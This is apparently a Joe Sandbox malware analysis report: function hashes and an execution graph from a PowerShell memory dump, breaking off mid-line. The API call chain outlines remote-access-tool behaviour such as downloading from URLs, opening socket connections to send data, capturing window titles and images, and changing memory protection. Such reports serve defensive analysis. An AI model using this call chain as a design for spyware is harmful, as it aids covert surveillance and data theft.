                                                                                                                                  • Source File: 0000000C.00000002.407124648.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_12_2_830000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 53256cb87c1ee8bf34112a36583d76e8ff150595d5bd6fb5644677dc97805fcf
                                                                                                                                  • Instruction ID: b3dcb0904899a0c9f7c57eec8461a3b3b3faee43d95dccb50cc71c67fa517fa0
                                                                                                                                  • Opcode Fuzzy Hash: 53256cb87c1ee8bf34112a36583d76e8ff150595d5bd6fb5644677dc97805fcf
                                                                                                                                  • Instruction Fuzzy Hash: A8F01C7150D3C08FC7025B108C65A11BF71BFA6205F1A80CB8485CE1A3D6259C06D7A6
                                                                                                                                  Function 008326A1 Relevance: .0, Instructions: 23COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000C.00000002.407124648.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_12_2_830000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: df8c8ee0a986b985d1487916b6cc2dd1b2f4c30c07aba03d0bedd027afc84920
                                                                                                                                  • Instruction ID: 5acbb07ccabbe84038e4fdef5b0b764241a8ef0b4f1fdfd64dd3782fd5e9e071
                                                                                                                                  • Opcode Fuzzy Hash: df8c8ee0a986b985d1487916b6cc2dd1b2f4c30c07aba03d0bedd027afc84920
                                                                                                                                  • Instruction Fuzzy Hash: 2AE09274204181CBD759AA64C801D52BB72FFEA314B18848ED4458F26BEA31DC43CB66
                                                                                                                                  Function 008314A7 Relevance: .0, Instructions: 23COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000C.00000002.407124648.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_12_2_830000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: c4c008b33f19a894764d6e32b4420fc5b02731461b8cc7ef1e088120c55ec1d2
                                                                                                                                  • Instruction ID: 11ac670b441512a77aec91fcee97b5501f7bc330d204355d9ef8439c32808f0a
                                                                                                                                  • Opcode Fuzzy Hash: c4c008b33f19a894764d6e32b4420fc5b02731461b8cc7ef1e088120c55ec1d2
                                                                                                                                  • Instruction Fuzzy Hash: 01E0D8327043458BDF29667490253AD7752FFE27A8F1140D6C461D764ADA308806C3A2

                                                                                                                                  Non-executed Functions

                                                                                                                                  Function 008308D8 Relevance: 15.4, Strings: 12, Instructions: 450COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000C.00000002.407124648.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_12_2_830000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 8#0g$8#0g$8#0g$8#0g$8#0g$8#0g$8#0g$8#0g$@#e$@#e$h%2g$h%2g
                                                                                                                                  • API String ID: 0-391320511
                                                                                                                                  • Opcode ID: 55c59fdc05ac42858ecbce0b9218f4c9f8c59eb94cce72da0d38b2c5f588e2e6
                                                                                                                                  • Instruction ID: 7dabad7f3d3b4fd9c251f9e91dd43fde9974a18adb49fa21f7c29eca5e3a70cb
                                                                                                                                  • Opcode Fuzzy Hash: 55c59fdc05ac42858ecbce0b9218f4c9f8c59eb94cce72da0d38b2c5f588e2e6
                                                                                                                                  • Instruction Fuzzy Hash: 80E1D035B042159FDB14DBA8C860A6ABBE6FBC4314F2885BAD949CB342DB71DC41CBD1
                                                                                                                                  Function 0083030A Relevance: 10.2, Strings: 8, Instructions: 166COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000C.00000002.407124648.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_12_2_830000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: @#e$@#e$L4#p$L4#p$L4#p$L:x$L:x$L:x
                                                                                                                                  • API String ID: 0-2735108596
                                                                                                                                  • Opcode ID: 9622bb3797ca9726e669ede86d71663db54fd14d70ce9a0d60c40b7e1d7539da
                                                                                                                                  • Instruction ID: b42e03f594be7235a997bd74d1c1ffd4641fdcf4d1ad692546713dff12c000a7
                                                                                                                                  • Opcode Fuzzy Hash: 9622bb3797ca9726e669ede86d71663db54fd14d70ce9a0d60c40b7e1d7539da
                                                                                                                                  • Instruction Fuzzy Hash: 3951E171B00209EBDF159A6898207BE77A6FBC0318F248076E645CB281DB74DE45CBA2
                                                                                                                                  Function 008305E2 Relevance: 10.2, Strings: 8, Instructions: 166COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000C.00000002.407124648.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_12_2_830000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $;x$$;x$$;x$@#e$@#e$L4#p$L4#p$L4#p
                                                                                                                                  • API String ID: 0-3165539518
                                                                                                                                  • Opcode ID: 2903bc9a2336e97d7e5d5697c6a815dc9637b48911e10ed911b0fae27197a169
                                                                                                                                  • Instruction ID: bb70ca014f60cf9a4a8a1d2b89b5bbfdcf73030ae285dee324efafeb7b6e17f2
                                                                                                                                  • Opcode Fuzzy Hash: 2903bc9a2336e97d7e5d5697c6a815dc9637b48911e10ed911b0fae27197a169
                                                                                                                                  • Instruction Fuzzy Hash: 7051F171B00349ABDF159A68C821BAE77A2FBC0314F248075E915CB285EB75ED51CFA2
                                                                                                                                  Function 008300BA Relevance: 10.2, Strings: 8, Instructions: 166COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000C.00000002.407124648.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_12_2_830000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: (:x$(:x$(:x$@#e$@#e$L4#p$L4#p$L4#p
                                                                                                                                  • API String ID: 0-1136836073
                                                                                                                                  • Opcode ID: 5280141583465dc7d48d17d795109445845d6f47592898e8301ba151bb02775c
                                                                                                                                  • Instruction ID: 392c4db409270d4e069a89c9c11ed25b9a1e1c2a93e52e54f20830171af04c2c
                                                                                                                                  • Opcode Fuzzy Hash: 5280141583465dc7d48d17d795109445845d6f47592898e8301ba151bb02775c
                                                                                                                                  • Instruction Fuzzy Hash: 3651E131B00209EBDF269A64C8247AF77A6FBC1314F248036E951DB292DB74DD41CBE2

                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:6.5%
                                                                                                                                  Dynamic/Decrypted Code Coverage:16.4%
                                                                                                                                  Signature Coverage:3.5%
                                                                                                                                  Total number of Nodes:1823
                                                                                                                                  Total number of Limit Nodes:56
                                                                                                                                  execution_graph 53075 415d41 53090 41b411 53075->53090 53077 415d4a 53101 4020f6 53077->53101 53082 4170c4 53125 401e8d 53082->53125 53086 401fd8 11 API calls 53087 4170d9 53086->53087 53088 401fd8 11 API calls 53087->53088 53089 4170e5 53088->53089 53131 4020df 53090->53131 53095 41b456 InternetReadFile 53100 41b479 53095->53100 53096 41b4a6 InternetCloseHandle InternetCloseHandle 53098 41b4b8 53096->53098 53098->53077 53099 401fd8 11 API calls 53099->53100 53100->53095 53100->53096 53100->53099 53142 4020b7 53100->53142 53102 40210c 53101->53102 53103 4023ce 11 API calls 53102->53103 53104 402126 53103->53104 53105 402569 28 API calls 53104->53105 53106 402134 53105->53106 53107 404aa1 53106->53107 53108 404ab4 53107->53108 53209 40520c 53108->53209 53110 404ac9 _Yarn 53111 404b40 WaitForSingleObject 53110->53111 53112 404b20 53110->53112 53114 404b56 53111->53114 53113 404b32 send 53112->53113 53115 404b7b 53113->53115 53215 4210cb 54 API calls 53114->53215 53118 401fd8 11 API calls 53115->53118 53117 404b69 SetEvent 53117->53115 53119 404b83 53118->53119 53120 401fd8 11 API calls 53119->53120 53121 404b8b 53120->53121 53121->53082 53122 401fd8 53121->53122 53123 4023ce 11 API calls 53122->53123 53124 401fe1 53123->53124 53124->53082 53126 402163 53125->53126 53130 40219f 53126->53130 53233 402730 11 API calls 53126->53233 53128 402184 53234 402712 11 API calls std::_Deallocate 53128->53234 53130->53086 53132 4020e7 53131->53132 53148 4023ce 53132->53148 53134 4020f2 53135 43bda0 53134->53135 53140 4461b8 __Getctype 53135->53140 53136 4461f6 53164 44062d 20 API calls _abort 53136->53164 53137 4461e1 RtlAllocateHeap 53139 41b42f InternetOpenW InternetOpenUrlW 53137->53139 53137->53140 53139->53095 53140->53136 53140->53137 53163 443001 7 API calls 2 library calls 53140->53163 53143 4020bf 53142->53143 53144 4023ce 11 API calls 53143->53144 53145 4020ca 53144->53145 53165 40250a 53145->53165 53147 4020d9 53147->53100 53149 402428 53148->53149 53150 4023d8 53148->53150 53149->53134 53150->53149 53152 4027a7 53150->53152 53153 402e21 53152->53153 53156 4016b4 53153->53156 53155 402e30 53155->53149 53158 4016c6 53156->53158 53159 4016cb 53156->53159 53157 4016f3 53157->53155 53162 43bd68 11 API calls _abort 53158->53162 53159->53157 53159->53158 53161 43bd67 53162->53161 53163->53140 53164->53139 53166 40251a 53165->53166 53167 402520 53166->53167 53168 402535 53166->53168 53172 402569 53167->53172 53182 4028e8 53168->53182 53171 402533 53171->53147 53193 402888 53172->53193 53174 40257d 53175 402592 53174->53175 53176 4025a7 53174->53176 53198 402a34 22 API calls 53175->53198 53178 4028e8 28 API calls 53176->53178 53181 4025a5 53178->53181 53179 40259b 53199 4029da 22 API calls 53179->53199 53181->53171 53183 4028f1 53182->53183 53184 402953 53183->53184 53185 4028fb 53183->53185 53207 4028a4 22 API calls 53184->53207 53188 402904 53185->53188 53190 402917 53185->53190 53201 402cae 53188->53201 53189 402915 53189->53171 53190->53189 53192 4023ce 11 API calls 53190->53192 53192->53189 53194 402890 53193->53194 53195 402898 53194->53195 53200 402ca3 22 API calls 53194->53200 53195->53174 53198->53179 53199->53181 53202 402cb8 __EH_prolog 53201->53202 53208 402e54 22 API calls 53202->53208 53204 4023ce 11 API calls 53206 402d92 53204->53206 53205 402d24 53205->53204 53206->53189 53208->53205 53210 405214 53209->53210 53211 4023ce 11 API calls 53210->53211 53212 40521f 53211->53212 53216 405234 53212->53216 53214 40522e 53214->53110 53215->53117 53217 405240 53216->53217 53218 40526e 53216->53218 53220 4028e8 28 API calls 53217->53220 53232 4028a4 22 API calls 53218->53232 53222 40524a 53220->53222 53222->53214 53233->53128 53234->53130 53235 10006d60 53236 10006d69 53235->53236 53237 10006d72 53235->53237 53239 10006c5f 53236->53239 53259 10005af6 GetLastError 53239->53259 53241 10006c6c 53279 10006d7e 53241->53279 53243 10006c74 53288 100069f3 53243->53288 53246 10006c8b 53246->53237 53252 10006cc9 53312 10006368 19 API calls _abort 53252->53312 53254 10006d12 53255 10006cce 53254->53255 53315 100068c9 25 API calls 53254->53315 53313 1000571e 19 API calls __dosmaperr 53255->53313 53256 10006ce6 53256->53254 53314 1000571e 19 API calls __dosmaperr 53256->53314 53260 10005b12 53259->53260 53261 10005b0c 53259->53261 53265 10005b61 SetLastError 53260->53265 53317 1000637b 19 API calls 2 library calls 53260->53317 53316 10005e08 10 API calls 2 library calls 53261->53316 53264 10005b24 53266 10005b2c 53264->53266 53319 10005e5e 10 API calls 2 library calls 53264->53319 53265->53241 53318 1000571e 19 API calls __dosmaperr 53266->53318 53268 10005b41 53268->53266 53270 10005b48 53268->53270 53320 1000593c 19 API calls _abort 53270->53320 53271 10005b32 53273 10005b6d SetLastError 53271->53273 53322 100055a8 36 API calls _abort 53273->53322 53274 10005b53 53321 1000571e 19 API calls __dosmaperr 53274->53321 53278 10005b5a 53278->53265 53278->53273 53280 10006d8a ___DestructExceptionObject 53279->53280 53281 10005af6 _abort 36 API calls 53280->53281 53286 10006d94 53281->53286 53283 10006e18 _abort 53283->53243 53286->53283 53323 100055a8 36 API calls _abort 53286->53323 53324 10005671 RtlEnterCriticalSection 53286->53324 53325 1000571e 19 API calls __dosmaperr 53286->53325 53326 10006e0f RtlLeaveCriticalSection _abort 53286->53326 53327 100054a7 53288->53327 53291 10006a14 GetOEMCP 53294 10006a3d 53291->53294 53292 10006a26 53293 10006a2b GetACP 53292->53293 53292->53294 53293->53294 53294->53246 53295 100056d0 53294->53295 53296 1000570e 53295->53296 53300 100056de _abort 53295->53300 53338 10006368 19 API calls _abort 53296->53338 53297 100056f9 RtlAllocateHeap 53299 1000570c 53297->53299 53297->53300 53299->53255 53302 10006e20 53299->53302 53300->53296 53300->53297 53337 1000474f 7 API calls 2 library calls 53300->53337 53303 100069f3 38 API calls 53302->53303 53304 10006e3f 53303->53304 53307 10006e90 IsValidCodePage 53304->53307 53309 10006e46 53304->53309 53311 10006eb5 ___scrt_fastfail 53304->53311 53306 10006cc1 53306->53252 53306->53256 53308 10006ea2 GetCPInfo 53307->53308 53307->53309 53308->53309 53308->53311 53349 10002ada 53309->53349 53339 10006acb GetCPInfo 53311->53339 53312->53255 53313->53246 53314->53254 53315->53255 53316->53260 53317->53264 53318->53271 53319->53268 53320->53274 53321->53278 53324->53286 53325->53286 53326->53286 53328 100054c4 53327->53328 53334 100054ba 53327->53334 53329 10005af6 _abort 36 API calls 53328->53329 53328->53334 53330 100054e5 53329->53330 53335 10007a00 36 API calls __fassign 53330->53335 53332 100054fe 53336 10007a2d 36 API calls __fassign 53332->53336 53334->53291 53334->53292 53335->53332 53336->53334 53337->53300 53338->53299 53345 10006b05 53339->53345 53348 10006baf 53339->53348 53342 10002ada _ValidateLocalCookies 5 API calls 53344 10006c5b 53342->53344 53344->53309 53356 100086e4 53345->53356 53347 10008a3e 41 API calls 53347->53348 53348->53342 53350 10002ae3 53349->53350 53351 10002ae5 IsProcessorFeaturePresent 53349->53351 53350->53306 53353 10002b58 53351->53353 53426 10002b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 53353->53426 53355 10002c3b 53355->53306 53357 100054a7 __fassign 36 API calls 53356->53357 53358 10008704 MultiByteToWideChar 53357->53358 53360 10008742 53358->53360 53368 100087da 53358->53368 53362 100056d0 20 API calls 53360->53362 53366 10008763 ___scrt_fastfail 53360->53366 53361 10002ada _ValidateLocalCookies 5 API calls 53363 10006b66 53361->53363 53362->53366 53370 10008a3e 53363->53370 53364 100087d4 53375 10008801 19 API calls _free 53364->53375 53366->53364 53367 100087a8 MultiByteToWideChar 53366->53367 53367->53364 53369 100087c4 GetStringTypeW 53367->53369 53368->53361 53369->53364 53371 100054a7 __fassign 36 API calls 53370->53371 53372 10008a51 53371->53372 53376 10008821 53372->53376 53375->53368 53377 1000883c 53376->53377 53378 10008862 MultiByteToWideChar 53377->53378 53379 10008a16 53378->53379 53380 1000888c 53378->53380 53381 10002ada _ValidateLocalCookies 5 API calls 53379->53381 53383 100056d0 20 API calls 53380->53383 53385 100088ad 53380->53385 53382 10006b87 53381->53382 53382->53347 53383->53385 53384 100088f6 MultiByteToWideChar 53386 1000890f 53384->53386 53402 10008962 53384->53402 53385->53384 53385->53402 53403 10005f19 53386->53403 53390 10008971 53392 10008992 53390->53392 53393 100056d0 20 API calls 53390->53393 53391 10008939 53395 10005f19 10 API calls 53391->53395 53391->53402 53394 10008a07 53392->53394 53396 10005f19 10 API calls 53392->53396 53393->53392 53411 10008801 19 API calls _free 53394->53411 53395->53402 53398 100089e6 53396->53398 53398->53394 53399 100089f5 WideCharToMultiByte 53398->53399 53399->53394 53400 10008a35 53399->53400 53413 10008801 19 API calls _free 53400->53413 53412 10008801 19 API calls _free 53402->53412 53414 10005c45 53403->53414 53405 10005f40 53408 10005f49 53405->53408 53418 10005fa1 9 API calls 2 library calls 53405->53418 53407 10005f89 LCMapStringW 53407->53408 53409 10002ada _ValidateLocalCookies 5 API calls 53408->53409 53410 10005f9b 53409->53410 53410->53390 53410->53391 53410->53402 53411->53402 53412->53379 53413->53402 53415 10005c71 53414->53415 53417 10005c75 __crt_fast_encode_pointer 53414->53417 53415->53417 53419 10005ce1 53415->53419 53417->53405 53418->53407 53420 10005d02 LoadLibraryExW 53419->53420 53421 10005cf7 53419->53421 53422 10005d37 53420->53422 53423 10005d1f GetLastError 53420->53423 53421->53415 53422->53421 53425 10005d4e FreeLibrary 53422->53425 53423->53422 53424 10005d2a LoadLibraryExW 53423->53424 53424->53422 53425->53421 53426->53355 53427 434906 53432 434bd8 SetUnhandledExceptionFilter 53427->53432 53429 43490b pre_c_initialization 53433 4455cc 20 API calls 2 library calls 53429->53433 53431 434916 53432->53429 53433->53431 53434 416be6 53454 401e65 53434->53454 53436 416bf2 53437 416c07 53436->53437 53438 416c1e 53436->53438 53439 401e65 22 API calls 53437->53439 53440 401e65 22 API calls 53438->53440 53441 416c0c 53439->53441 53442 416c23 53440->53442 53443 4020f6 28 API calls 53441->53443 53444 4020f6 28 API calls 53442->53444 53445 416c17 53443->53445 53444->53445 53459 417308 53445->53459 53448 401e8d 11 API calls 53449 4170cd 53448->53449 53450 401fd8 11 API calls 53449->53450 53451 4170d9 53450->53451 53452 401fd8 11 API calls 53451->53452 53453 4170e5 53452->53453 53455 401e6d 53454->53455 53456 401e75 53455->53456 53493 402158 22 API calls 53455->53493 53456->53436 53460 4174c0 53459->53460 53461 41731e 53459->53461 53463 401fd8 11 API calls 53460->53463 53494 4046f7 53461->53494 53465 416c38 53463->53465 53465->53448 53468 4174b2 53603 404ee2 99 API calls 53468->53603 53473 417365 53570 402ea1 53473->53570 53476 404aa1 61 API calls 53477 417380 53476->53477 53478 401fd8 11 API calls 53477->53478 53479 417388 53478->53479 53480 401fd8 11 API calls 53479->53480 53490 417390 53480->53490 53483 4020b7 28 API calls 53483->53490 53485 41bdaf 28 API calls 53485->53490 53486 402ea1 28 API calls 53486->53490 53487 404aa1 61 API calls 53487->53490 53488 401fd8 11 API calls 53488->53490 53490->53483 53490->53485 53490->53486 53490->53487 53490->53488 53491 4174a7 53490->53491 53579 41b80c GlobalMemoryStatusEx 53490->53579 53580 41b890 GetSystemTimes Sleep GetSystemTimes 53490->53580 53582 41bb27 53490->53582 53587 401f09 53490->53587 53590 404e26 WaitForSingleObject 53491->53590 53495 4020df 11 API calls 53494->53495 53496 404707 53495->53496 53497 4020df 11 API calls 53496->53497 53498 40471e 53497->53498 53499 404736 53498->53499 53604 40482d 53498->53604 53501 4048c8 connect 53499->53501 53502 404a1b 53501->53502 53503 4048ee 53501->53503 53504 40497e 53502->53504 53505 404a21 WSAGetLastError 53502->53505 53503->53504 53506 404923 53503->53506 53612 40531e 53503->53612 53504->53468 53561 41bdaf 53504->53561 53505->53504 53507 404a31 53505->53507 53647 420cf1 27 API calls 53506->53647 53509 404932 53507->53509 53510 404a36 53507->53510 53515 402093 28 API calls 53509->53515 53652 41cb72 30 API calls 53510->53652 53512 40490f 53617 402093 53512->53617 53514 40492b 53514->53509 53518 404941 53514->53518 53519 404a80 53515->53519 53517 404a40 53653 4052fd 28 API calls 53517->53653 53525 404950 53518->53525 53526 404987 53518->53526 53522 402093 28 API calls 53519->53522 53527 404a8f 53522->53527 53529 402093 28 API calls 53525->53529 53649 421ad1 54 API calls 53526->53649 53530 41b580 80 API calls 53527->53530 53533 40495f 53529->53533 53530->53504 53536 402093 28 API calls 53533->53536 53534 40498f 53537 4049c4 53534->53537 53538 404994 53534->53538 53540 40496e 53536->53540 53651 420e97 28 API calls 53537->53651 53542 402093 28 API calls 53538->53542 53545 41b580 80 API calls 53540->53545 53544 4049a3 53542->53544 53547 402093 28 API calls 53544->53547 53548 404973 53545->53548 53546 4049cc 53549 4049f9 CreateEventW CreateEventW 53546->53549 53551 402093 28 API calls 53546->53551 53550 4049b2 53547->53550 53648 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53548->53648 53549->53504 53552 41b580 80 API calls 53550->53552 53554 4049e2 53551->53554 53555 4049b7 53552->53555 53556 402093 28 API calls 53554->53556 53650 421143 52 API calls 53555->53650 53558 4049f1 53556->53558 53559 41b580 80 API calls 53558->53559 53560 4049f6 53559->53560 53560->53549 53562 41bdbc 53561->53562 53563 4020b7 28 API calls 53562->53563 53564 41734f 53563->53564 53565 402f31 53564->53565 53566 4020df 11 API calls 53565->53566 53567 402f3d 53566->53567 53568 4032a0 28 API calls 53567->53568 53569 402f59 53568->53569 53569->53473 53572 402eb0 53570->53572 53571 402ef2 53573 401fb0 28 API calls 53571->53573 53572->53571 53577 402ee7 53572->53577 53574 402ef0 53573->53574 53575 402055 11 API calls 53574->53575 53576 402f09 53575->53576 53576->53476 53712 403365 28 API calls 53577->53712 53579->53490 53581 41b8d5 _swprintf __aulldiv 53580->53581 53581->53490 53713 436f10 53582->53713 53588 402252 11 API calls 53587->53588 53589 401f12 53588->53589 53589->53490 53591 404e40 SetEvent CloseHandle 53590->53591 53592 404e57 closesocket 53590->53592 53593 404ed8 53591->53593 53594 404e64 53592->53594 53593->53468 53595 404e7a 53594->53595 53762 4050e4 84 API calls 53594->53762 53596 404e8c WaitForSingleObject 53595->53596 53597 404ece SetEvent CloseHandle 53595->53597 53763 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53596->53763 53597->53593 53600 404e9b SetEvent WaitForSingleObject 53764 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53600->53764 53602 404eb3 SetEvent CloseHandle CloseHandle 53602->53597 53605 404846 socket 53604->53605 53606 404839 53604->53606 53607 404860 CreateEventW 53605->53607 53608 404842 53605->53608 53611 40489e WSAStartup 53606->53611 53607->53499 53608->53499 53610 40483e 53610->53605 53610->53608 53611->53610 53613 4020df 11 API calls 53612->53613 53614 40532a 53613->53614 53654 4032a0 53614->53654 53616 405346 53616->53512 53618 40209b 53617->53618 53619 4023ce 11 API calls 53618->53619 53620 4020a6 53619->53620 53658 4024ed 53620->53658 53623 41b580 53624 41b631 53623->53624 53625 41b596 GetLocalTime 53623->53625 53626 401fd8 11 API calls 53624->53626 53627 40531e 28 API calls 53625->53627 53629 41b639 53626->53629 53628 41b5d8 53627->53628 53662 406383 53628->53662 53631 401fd8 11 API calls 53629->53631 53633 41b641 53631->53633 53633->53506 53636 406383 28 API calls 53637 41b5fc 53636->53637 53672 40723b 77 API calls 53637->53672 53639 41b60a 53640 401fd8 11 API calls 53639->53640 53641 41b616 53640->53641 53642 401fd8 11 API calls 53641->53642 53643 41b61f 53642->53643 53644 401fd8 11 API calls 53643->53644 53645 41b628 53644->53645 53646 401fd8 11 API calls 53645->53646 53646->53624 53647->53514 53648->53504 53649->53534 53650->53548 53651->53546 53652->53517 53656 4032aa 53654->53656 53655 4032c9 53655->53616 53656->53655 53657 4028e8 28 API calls 53656->53657 53657->53655 53659 4024f9 53658->53659 53660 40250a 28 API calls 53659->53660 53661 4020b1 53660->53661 53661->53623 53673 4051ef 53662->53673 53664 406391 53677 402055 53664->53677 53667 402f10 53709 401fb0 53667->53709 53669 402f1e 53670 402055 11 API calls 53669->53670 53671 402f2d 53670->53671 53671->53636 53672->53639 53674 4051fb 53673->53674 53683 405274 53674->53683 53676 405208 53676->53664 53678 402061 53677->53678 53679 4023ce 11 API calls 53678->53679 53680 40207b 53679->53680 53705 40267a 53680->53705 53684 405282 53683->53684 53685 405288 53684->53685 53686 40529e 53684->53686 53694 4025f0 53685->53694 53688 4052f5 53686->53688 53689 4052b6 53686->53689 53703 4028a4 22 API calls 53688->53703 53692 4028e8 28 API calls 53689->53692 53693 40529c 53689->53693 53692->53693 53693->53676 53695 402888 22 API calls 53694->53695 53696 402602 53695->53696 53697 402672 53696->53697 53698 402629 53696->53698 53704 4028a4 22 API calls 53697->53704 53700 4028e8 28 API calls 53698->53700 53702 40263b 53698->53702 53700->53702 53702->53693 53706 40268b 53705->53706 53707 4023ce 11 API calls 53706->53707 53708 40208d 53707->53708 53708->53667 53710 4025f0 28 API calls 53709->53710 53711 401fbd 53710->53711 53711->53669 53712->53574 53714 41bb46 GetForegroundWindow GetWindowTextW 53713->53714 53715 40417e 53714->53715 53716 404186 53715->53716 53721 402252 53716->53721 53718 404191 53725 4041bc 53718->53725 53722 40225c 53721->53722 53723 4022ac 53721->53723 53722->53723 53729 402779 11 API calls std::_Deallocate 53722->53729 53723->53718 53726 4041c8 53725->53726 53730 4041d9 53726->53730 53728 40419c 53728->53490 53729->53723 53731 4041e9 53730->53731 53732 404206 53731->53732 53733 4041ef 53731->53733 53747 4027e6 53732->53747 53737 404267 53733->53737 53736 404204 53736->53728 53738 402888 22 API calls 53737->53738 53739 40427b 53738->53739 53740 404290 53739->53740 53741 4042a5 53739->53741 53758 4042df 22 API calls 53740->53758 53742 4027e6 28 API calls 53741->53742 53746 4042a3 53742->53746 53744 404299 53759 402c48 22 API calls 53744->53759 53746->53736 53748 4027ef 53747->53748 53749 402851 53748->53749 53750 4027f9 53748->53750 53761 4028a4 22 API calls 53749->53761 53753 402802 53750->53753 53754 402815 53750->53754 53760 402aea 28 API calls __EH_prolog 53753->53760 53756 402813 53754->53756 53757 402252 11 API calls 53754->53757 53756->53736 53757->53756 53758->53744 53759->53746 53760->53756 53762->53595 53763->53600 53764->53602 53765 1000c7a7 53766 1000c7be 53765->53766 53771 1000c82c 53765->53771 53766->53771 53775 1000c7e6 GetModuleHandleA 53766->53775 53767 1000c872 53768 1000c835 GetModuleHandleA 53770 1000c83f 53768->53770 53770->53770 53770->53771 53771->53767 53771->53768 53776 1000c7ef 53775->53776 53782 1000c82c 53775->53782 53785 1000c803 53776->53785 53778 1000c872 53779 1000c835 GetModuleHandleA 53780 1000c83f 53779->53780 53780->53780 53780->53782 53782->53778 53782->53779 53786 1000c809 53785->53786 53787 1000c82c 53786->53787 53788 1000c80d VirtualProtect 53786->53788 53790 1000c872 53787->53790 53791 1000c835 GetModuleHandleA 53787->53791 53788->53787 53789 1000c81c VirtualProtect 53788->53789 53789->53787 53792 1000c83f 53791->53792 53792->53787 53793 43bea8 53796 43beb4 _swprintf ___BuildCatchObject 53793->53796 53794 43bec2 53809 44062d 20 API calls _abort 53794->53809 53796->53794 53797 43beec 53796->53797 53804 445909 EnterCriticalSection 53797->53804 53799 43bef7 53805 43bf98 53799->53805 53800 43bec7 ___BuildCatchObject ___std_exception_copy 53804->53799 53806 43bfa6 53805->53806 53808 43bf02 53806->53808 53811 4497ec 37 API calls 2 library calls 53806->53811 53810 43bf1f LeaveCriticalSection std::_Lockit::~_Lockit 53808->53810 53809->53800 53810->53800 53811->53806 53812 4458c8 53813 4458d3 53812->53813 53815 4458fc 53813->53815 53816 4458f8 53813->53816 53818 448b04 53813->53818 53825 445920 DeleteCriticalSection 53815->53825 53826 44854a 53818->53826 53821 448b49 InitializeCriticalSectionAndSpinCount 53822 448b34 53821->53822 53833 43502b 53822->53833 53824 448b60 53824->53813 53825->53816 53827 448576 53826->53827 53828 44857a 53826->53828 53827->53828 53830 44859a 53827->53830 53840 4485e6 53827->53840 53828->53821 53828->53822 53830->53828 53831 4485a6 GetProcAddress 53830->53831 53832 4485b6 __crt_fast_encode_pointer 53831->53832 53832->53828 53834 435036 IsProcessorFeaturePresent 53833->53834 53835 435034 53833->53835 53837 435078 53834->53837 53835->53824 53847 43503c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 53837->53847 53839 43515b 53839->53824 53841 448607 LoadLibraryExW 53840->53841 53846 4485fc 53840->53846 53842 448624 GetLastError 53841->53842 53843 44863c 53841->53843 53842->53843 53844 44862f LoadLibraryExW 53842->53844 53845 448653 FreeLibrary 53843->53845 53843->53846 53844->53843 53845->53846 53846->53827 53847->53839 53848 418acd 53849 418af0 53848->53849 53850 418af8 SHCreateMemStream 53849->53850 53861 418691 GdipLoadImageFromStream 53850->53861 53852 418b0c 53862 4192c9 23 API calls new 53852->53862 53854 418b1a SHCreateMemStream 53863 418706 GdipSaveImageToStream 53854->53863 53856 418b62 53857 40520c 28 API calls 53856->53857 53858 418b7b 53857->53858 53865 4186b4 GdipDisposeImage 53858->53865 53860 418bbd 53861->53852 53862->53854 53864 418726 53863->53864 53864->53856 53865->53860 53866 41e04e 53867 41e063 _Yarn ___scrt_fastfail 53866->53867 53868 41e266 53867->53868 53869 432f55 21 API calls 53867->53869 53874 41e21a 53868->53874 53880 41dbf3 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_fastfail 53868->53880 53873 41e213 ___scrt_fastfail 53869->53873 53871 41e277 53871->53874 53881 